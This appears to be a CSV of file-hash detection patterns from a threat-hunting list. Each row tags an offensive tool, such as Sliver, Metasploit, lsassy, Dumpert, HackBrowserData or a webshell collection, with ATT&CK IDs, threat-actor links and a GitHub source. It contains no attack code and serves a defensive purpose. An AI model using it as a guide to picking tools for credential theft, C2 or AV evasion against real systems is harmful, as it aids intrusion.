"*4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52*",".{0,1000}4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26136"
"*4b7f6f3571fda33d3c305207518d9a7a8f328e2828f249735368beb8b6f04210*",".{0,1000}4b7f6f3571fda33d3c305207518d9a7a8f328e2828f249735368beb8b6f04210.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26137"
"*4b8997973189f7f85b4c2ad8fd3320269481d70b70c67046d0994844e5fb852a*",".{0,1000}4b8997973189f7f85b4c2ad8fd3320269481d70b70c67046d0994844e5fb852a.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","26138"
"*4b999cd6a88ade1b7cd18b87d34495d4a03af9202a4f8b6a20b98f144c01d084*",".{0,1000}4b999cd6a88ade1b7cd18b87d34495d4a03af9202a4f8b6a20b98f144c01d084.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26139"
"*4b9bdaff523939442961fd62acfe38c8bd379dd294d066d4770ce15e9c955e9f*",".{0,1000}4b9bdaff523939442961fd62acfe38c8bd379dd294d066d4770ce15e9c955e9f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26140"
"*4b9dbffee430d20fd696391f01a748edea00b6feaef8589f3ff33b01abe1bca8*",".{0,1000}4b9dbffee430d20fd696391f01a748edea00b6feaef8589f3ff33b01abe1bca8.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26142"
"*4b9e2f5e4582b162aee0241e31482b2a50eb34712b13d2911726b3b988ccdfeb*",".{0,1000}4b9e2f5e4582b162aee0241e31482b2a50eb34712b13d2911726b3b988ccdfeb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26143"
"*4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e*",".{0,1000}4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26145"
"*4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04*",".{0,1000}4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26148"
"*4bb5b8961566bdbdc3787a847a55730ce32d1822677bcd7c412cf2d7f54262fd*",".{0,1000}4bb5b8961566bdbdc3787a847a55730ce32d1822677bcd7c412cf2d7f54262fd.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#filehash","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","26150"
"*4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f*",".{0,1000}4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26151"
"*4bb7cf0cb193d6c553a3f11a45b8524a1ba775922e39b92197004f95509728b6*",".{0,1000}4bb7cf0cb193d6c553a3f11a45b8524a1ba775922e39b92197004f95509728b6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26152"
"*4bb963704e0b986784a5d5b1ad7cc6daffc7e062fedf0025df4974e8b0478602*",".{0,1000}4bb963704e0b986784a5d5b1ad7cc6daffc7e062fedf0025df4974e8b0478602.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","26153"
"*4bbc3665b5dd41184146e64b1b3d563af181600c9375d3e9d99170684a82a8ce*",".{0,1000}4bbc3665b5dd41184146e64b1b3d563af181600c9375d3e9d99170684a82a8ce.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","26155"
"*4bbce282aa26a449030a398e4ff5e980137a05d91f205037ac1bb297f3c36513*",".{0,1000}4bbce282aa26a449030a398e4ff5e980137a05d91f205037ac1bb297f3c36513.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26156"
"*4bc0cedc1fa6de2b307d94dbb2bc90133a937d3fdf884a877565396e3fb0d027*",".{0,1000}4bc0cedc1fa6de2b307d94dbb2bc90133a937d3fdf884a877565396e3fb0d027.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","26158"
"*4bc67e5404e070bce9952de907f957cb0451a92c7a0c468a73755b2947f344c6*",".{0,1000}4bc67e5404e070bce9952de907f957cb0451a92c7a0c468a73755b2947f344c6.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26160"
"*4bcb041abeeb758cbb98edcdba1d0cadc1c8fba413d100b1077688555860e930*",".{0,1000}4bcb041abeeb758cbb98edcdba1d0cadc1c8fba413d100b1077688555860e930.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26162"
"*4bd26151318dad8f056062ca75ccffccda34afc9edea03f6dd5056bc9a961996*",".{0,1000}4bd26151318dad8f056062ca75ccffccda34afc9edea03f6dd5056bc9a961996.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","26164"
"*4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50*",".{0,1000}4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26165"
"*4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f*",".{0,1000}4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26166"
"*4bdff76e56960fe9ef5cceb930d6669ec9e04ec8dceb9b5c856306abc1862f12*",".{0,1000}4bdff76e56960fe9ef5cceb930d6669ec9e04ec8dceb9b5c856306abc1862f12.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26168"
"*4be7282a5c184870c130913381641c2c531d773eec25fc810394fca9ec9c386c*",".{0,1000}4be7282a5c184870c130913381641c2c531d773eec25fc810394fca9ec9c386c.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","26171"
"*4bea75105d616920248cea812e818c2b103b786e050ebc27394aba87fdaca5d4*",".{0,1000}4bea75105d616920248cea812e818c2b103b786e050ebc27394aba87fdaca5d4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26172"
"*4bf7e7b595356585599b4b2773b8a463d7b9765c97012dcd5a44eb6d547f6a1d*",".{0,1000}4bf7e7b595356585599b4b2773b8a463d7b9765c97012dcd5a44eb6d547f6a1d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26176"
"*4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314*",".{0,1000}4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26178"
"*4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64*",".{0,1000}4bff519a79e681ee5bb9b4ef66794344224c2084b36cd947ac29646a5687ab64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26180"
"*4c0064dbf7ebbd9b8c67a355929d715cd814436d0857625a5b92468558f6393e*",".{0,1000}4c0064dbf7ebbd9b8c67a355929d715cd814436d0857625a5b92468558f6393e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26181"
"*4c02774a5edb8a559beebcb64833177a893b49fb8eb9bfd2e650155a207c7ba7*",".{0,1000}4c02774a5edb8a559beebcb64833177a893b49fb8eb9bfd2e650155a207c7ba7.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","26182"
"*4c0321729bb82e936804a1a1f8f76f6ce9906196378d0dd5441e344cda75f129*",".{0,1000}4c0321729bb82e936804a1a1f8f76f6ce9906196378d0dd5441e344cda75f129.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26183"
"*4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa*",".{0,1000}4c069fe55bd14ff52667766cd057196992b0275c78a2d8d7139b7d57c90234fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26184"
"*4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8*",".{0,1000}4c0700a6f8d222d9b2023a800e0f286fc43e0354ec23ea21f9344adfd2fe12c8.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","26185"
"*4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c*",".{0,1000}4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","26186"
"*4c146c6027d7714c632de29b05610a352ece4a5a9bae1d629d199ce9cf977d73*",".{0,1000}4c146c6027d7714c632de29b05610a352ece4a5a9bae1d629d199ce9cf977d73.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26188"
"*4c1a18d13cca40ce96d226c7f24c234a236826e4763bf62ba2b18e64b4d608f7*",".{0,1000}4c1a18d13cca40ce96d226c7f24c234a236826e4763bf62ba2b18e64b4d608f7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26190"
"*4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5*",".{0,1000}4c1c75f1a66eab31836ec53726fc47591a534688e79a5818ef63c1682de88cd5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26191"
"*4c205dad7c4b9f5f35fc8f127bc216e691f6f323e7b976512cecdce4f97a1bee*",".{0,1000}4c205dad7c4b9f5f35fc8f127bc216e691f6f323e7b976512cecdce4f97a1bee.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26192"
"*4c22a00104b52b74247f83b5c50ca09d5e9ed2db3d7d1843fe75fc283d50ffb1*",".{0,1000}4c22a00104b52b74247f83b5c50ca09d5e9ed2db3d7d1843fe75fc283d50ffb1.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26193"
"*4c230850f0fab974effc07d9ac7df6d11f2d49cac19d71da269d1c1d18e574e2*",".{0,1000}4c230850f0fab974effc07d9ac7df6d11f2d49cac19d71da269d1c1d18e574e2.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26194"
"*4c244a97bd354cbbefe7cfac027dfdd157b921ee5f9b66f7dce785136e657cfd*",".{0,1000}4c244a97bd354cbbefe7cfac027dfdd157b921ee5f9b66f7dce785136e657cfd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26195"
"*4C244D2DFBC2E2A8803D3F5522D9F4A788A3A38AF3A37D86D6374A56218D29E9*",".{0,1000}4C244D2DFBC2E2A8803D3F5522D9F4A788A3A38AF3A37D86D6374A56218D29E9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26196"
"*4c24b427581c8989acf962bc4f42b00331b4035e2155cdf97db0298fd0a34b65*",".{0,1000}4c24b427581c8989acf962bc4f42b00331b4035e2155cdf97db0298fd0a34b65.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26197"
"*4c2a1547f0dab58a9db68d236d1a6aa817761b678c84b83f36d6dc31066d7cc3*",".{0,1000}4c2a1547f0dab58a9db68d236d1a6aa817761b678c84b83f36d6dc31066d7cc3.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","26199"
"*4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5*",".{0,1000}4c33b97878d1d543f60ca27673d99dc8b420628820ce29a6ff9d658f410254a5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26200"
"*4c341727d28ddb31f23de1e8bd96e5ebc0b9c456570af57af793b7efe9bf95ae*",".{0,1000}4c341727d28ddb31f23de1e8bd96e5ebc0b9c456570af57af793b7efe9bf95ae.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","26201"
